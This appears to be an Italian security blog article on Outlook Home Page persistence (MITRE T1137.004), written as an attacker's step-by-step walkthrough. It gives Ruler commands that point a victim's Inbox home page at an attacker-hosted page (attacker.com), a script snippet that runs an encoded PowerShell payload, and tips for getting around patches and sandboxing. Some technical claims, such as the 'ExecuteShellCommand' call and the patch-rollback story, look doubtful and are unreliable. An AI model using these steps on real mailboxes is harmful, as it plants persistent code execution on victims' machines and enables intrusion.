Persistence tramite Outlook Home Page: Office Application Startup - Outlook Home Page (T1137.004)
La funzionalità Home Page di Microsoft Outlook rappresenta un vettore di persistenza sofisticato che sfrutta una caratteristica legacy del client di posta. Questa tecnica permette agli attaccanti di caricare automaticamente pagine HTML malevole all'apertura di specifiche cartelle di Outlook, garantendo l'esecuzione di codice ogni volta che l'utente accede alla propria casella di posta.
L'abuso di questa funzionalità si inserisce nella tattica TA0003 (Persistence), consentendo agli avversari di mantenere l'accesso ai sistemi compromessi attraverso riavvii e cambi di credenziali. La particolarità di questo metodo risiede nel fatto che il codice malevolo viene eseguito semplicemente navigando tra le cartelle di Outlook, senza richiedere ulteriori interazioni da parte dell'utente.
Ad oggi, 1 gruppo APT ha documentato l'utilizzo di questa tecnica e 1 tool specializzato ne automatizza lo sfruttamento. Microsoft ha rilasciato patch specifiche per mitigare questa vulnerabilità, ma la natura legacy della funzionalità continua a rappresentare un rischio per le organizzazioni che non hanno applicato gli aggiornamenti di sicurezza.
Lo sfruttamento della Home Page di Outlook richiede una comprensione approfondita del protocollo MAPI e dell'architettura delle cartelle Exchange. Il tool principale per automatizzare questo attacco è Ruler, che permette di interagire con le caselle di posta remote attraverso RPC over HTTP.
Per iniziare l'attacco, è necessario prima enumerare le cartelle disponibili nella casella di posta target:
ruler --email victim@company.com display
Una volta identificate le cartelle, si può configurare una Home Page malevola. L'approccio più efficace prevede l'hosting di una pagina HTML contenente JavaScript che eseguirà comandi PowerShell:
ruler --email victim@company.com homepage set --folder Inbox --url http://attacker.com/payload.html
Il payload HTML può sfruttare ActiveX o tecniche di evasione del sandbox di Outlook. Un esempio particolarmente efficace utilizza il metodo window.external per interagire con l'ambiente host:
<script>
window.external.ExecuteShellCommand('powershell.exe', '-enc <base64_payload>');
</script>
Per verificare che la Home Page sia stata configurata correttamente, è possibile ispezionare le proprietà della cartella:
ruler --email victim@company.com homepage display --folder Inbox
Un aspetto critico è bypassare le patch di sicurezza. Il gruppo OilRig ha dimostrato come sfruttare CVE-2017-11774 per rollback della patch KB3191938, ripristinando la vulnerabilità originale. Questa tecnica avanzata richiede privilegi elevati ma garantisce il successo dell'attacco anche su sistemi parzialmente patchati.
Nel laboratorio di test, è fondamentale verificare il comportamento su diverse versioni di Outlook. Le versioni precedenti al 2016 sono particolarmente vulnerabili, mentre quelle successive richiedono tecniche di evasione più sofisticate come l'embedding di contenuti in iframe o l'uso di data URI per nascondere il payload.
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo